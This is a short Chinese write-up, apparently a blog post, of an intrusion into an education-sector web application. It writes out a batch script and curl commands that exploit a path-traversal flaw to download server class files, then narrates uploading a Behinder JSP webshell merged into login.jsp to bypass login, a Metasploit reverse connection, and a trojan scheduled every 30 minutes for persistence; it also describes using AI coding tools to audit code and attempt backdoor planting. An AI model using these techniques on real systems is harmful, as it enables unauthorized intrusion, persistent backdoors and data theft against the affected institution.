记一次edu渗透之从任意文件访问漏洞到后门植入

利用先前未修复的文件读取漏洞，获取目标class的源码。

@echo off
SET INPUT_PARAM=%1
echo  C:\target\WEB-INF\classes\%INPUT_PARAM:.=\%.class --create-dirs http://target/imageAction!getImageByFullUrl.action?fullImgUrl=../../WEB-INF/classes/%INPUT_PARAM:.=/%.class

curl -o  C:\target\ --create-dirs http://target/imageAction!getImageByFullUrl.action?fullImgUrl=../../

接着，采用jdax工具进行反编译处理。随后，利用Claude Code工具进行代码审查。

在此过程中，我们发现了HttpAction组件中存在的任意文件上传漏洞。
通过分析structconfig，我们确定了访问Action的入口点。
用curl工具上传冰蝎jsp文件，我们观察到在未登录状态下，冰蝎无法连接并302至login.jsp，且直接使用相对路径无法使用任意文件读取到。
因此，我们将其与login.jsp文件合并，并使用绝对路径上传（任意文件访问不存在的文件时，在log中hutool报错绝对路径），实现了未授权访问jsp webshell（先放个蚁剑的图）

进入发现之前使用相对路径上传的jsp在tomcat目录下的bin（做个记录提醒后人）
内网穿透，冰蝎使用msf反向连接成功。最后本来想用cursor美滋滋植入一个msf后门

但是Failed to make entry in the registry for persistence

只好手动生成木马，并计划任务30分钟运行一次，大功告成